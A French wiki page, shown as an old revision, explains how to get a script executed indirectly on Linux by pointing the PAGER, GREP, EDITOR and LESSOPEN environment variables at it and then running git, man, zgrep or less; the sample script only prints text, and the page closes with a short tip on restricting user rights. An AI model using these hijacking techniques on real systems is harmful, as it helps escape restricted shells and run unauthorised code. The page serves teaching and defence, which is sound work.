Outils pour utilisateurs

Outils du site


appsysteme:detournement_de_commande_-_variables_d_environnement

Ceci est une ancienne révision du document !


Exécution détourné de commandes - Variables d'environnement

1.Présentation

Le but de cet article est de montrer comment il est possible d'arriver à effectuer un script runme.sh sans l'appeler depuis le shell.

Le script est le suivant :

#! /bin/bash

echo "Hacker forever !"
echo "Remember it !"

2.Exploitation

Nous allons utiliser les variables d'environnement présentes sur les systèmes d'exploitation Linux pour parvenir à nos fins.

2.1 $PAGER

export PAGER=./runme.sh

Appel du script :

git -p help</code
ou 
<code> man man 

2.2 $GREP

 
export GREP=./runme.sh
zgrep aa aa

2.3 $EDITOR

export EDITOR=/tmp/runme.sh
less a

2.4 $LESSOPEN

export LESSOPEN=./runme.sh
less a

3.Comment se protéger

Il faut bien paramétrer les droits sur votre système Linux pour que les utilisateurs n'ai que les droits nécessaires au bon fonctionnement de leur machine dans leur travail quotidien.

Source : Misc n°83 janvier/février 2016

appsysteme/detournement_de_commande_-_variables_d_environnement.1461064265.txt.gz · Dernière modification: 2016/07/04 08:37 (modification externe)